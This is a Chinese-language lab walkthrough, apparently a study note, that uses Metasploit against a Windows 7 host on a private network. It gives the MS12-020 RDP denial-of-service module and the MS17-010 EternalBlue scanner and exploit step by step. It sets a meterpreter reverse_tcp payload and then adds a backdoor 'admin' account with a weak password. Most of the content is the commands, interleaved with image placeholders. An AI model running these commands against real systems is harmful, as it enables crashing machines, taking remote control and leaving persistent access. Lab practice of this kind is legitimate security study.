MS12-020
首先先进入root用户 su root
msfconsole 从终端进入msf框架
msfconsole
![image-20210429232434694]()
查找漏洞 search 12_020
search 12_020
![image-20210429232504111]()
使用该漏洞利用代码
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
![image-20210429233413974]()
查看使用方法
show options
![image-20210429233426606]()
查看靶机的ip地址
ipconfig
![image-20210429233806813]()
查看靶机开放端口
netstat -ano
![image-20210429235403692]()
开发3389端口
![image-20210429235804953]()
![image-20210429235947192]()
![image-20210430000041630]()
![image-20210430000114648]()
![image-20210430000132952]()
![image-20210430000142823]()
![image-20210430000221280]()
![image-20210430001107406]()
![image-20210430001142350]()
![image-20210430001638674]()
设置参数
set RHOST 192.168.74.134
set RPORT 3389
![image-20210429233952245]()
查看
show options
![image-20210429234046172]()
攻击
exploit
或者 run
![image-20210430001750923]()
![image-20210430001944853]()
MS17-010
msfconsole 从终端进入msf框架
msfconsole
![image-20210430002110301]()
查找MS17-010相关利用代码
search 17_010
![image-20210430002257581]()
检测内网中存在漏洞的主机系统
use auxiliary/scanner/smb/smb_ms17_010
show options
![image-20210430002355666]()
![image-20210430002429892]()
查看445端口是否开放
![image-20210430002956797]()
设置参数
set RHOST 192.168.74.134/24
show options
![image-20210430002738779]()
run 出现加号可入侵
run
![image-20210430004134286]()
使用模块进行入侵
search ms17_010
![image-20210430004152722]()
调用永恒之蓝攻击模块
use exploit/windows/smb/ms17_010_eternalblue
show options
![image-20210430004213005]()
设置参数
set RHOST 192.168.74.134 set payload windows/x64/meterpreter/reverse_tcp payload set LHOST 192.168.74.134
show options
![image-20210430004230669]()
攻击
run
![image-20210430004412043]()
创建一个ammin用户
net user admin 123456 /add
![image-20210430004437433]()
到靶机查看
net user
![image-20210430004521099]()
参考资料
win7旗舰版怎么开启3389端口?
win7怎么打开端口
Metasploit(MSF)快速使用MS12-020、MS17-010(永恒之蓝)漏洞
关于使用msf渗透攻击Win7主机并远程执行命令的复习